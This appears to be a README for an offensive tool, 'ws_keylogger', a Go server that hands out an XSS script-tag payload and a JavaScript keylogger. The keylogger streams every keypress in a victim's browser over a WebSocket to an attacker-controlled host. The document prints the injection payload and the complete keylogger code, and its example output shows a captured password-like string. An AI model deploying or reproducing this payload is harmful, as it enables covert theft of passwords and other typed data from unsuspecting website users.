# WebSocket Keylogger
Sends all keys pressed in the browser to a web socket.

## Usage
```
Usage of ./ws_keylogger:
  -external-addr string
        External address for payload generation: <example.com>
  -listen-addr string
        Address to listen on: <ip:port>
```

## Example Output
```
go run main.go --listen-addr me:8000
INFO[0000]~/go/src/ws_keylogger/main.go:80 main.main() launching on me:8000                         
INFO[0007]~/go/src/ws_keylogger/main.go:55 main.serveWS() connection from 192.168.1.5:61418
administratorPa$5%SDFGj901
```

## Run
```
go run main.go --listen-addr me:8000
```
The `listen-addr` should contain a hostname (or IP) and a port for the web server to listen on. `external-addr` should be the value you want used in the payloads generated (likely an external domain, as opposed to an internal IP). If not defined, default to `listen-addr`.

or use the pre-built binary:
```
./ws_keylogger --listen-addr me:8000
```
;)

## Get Generated  Payloads  From
```
curl <ip>:8000/
```

## Example
### XSS Payload
```html
<script src='http://me:8000/k.js'></script>
```

### Keylogger Code (k.js)
```javascript
(function () {
    var conn = new WebSocket("ws://me:8000/ws");
    document.onkeypress = keypress;
    function keypress(evt) {
        str = String.fromCharCode(evt.which);
        conn.send(str);
    }
})();
```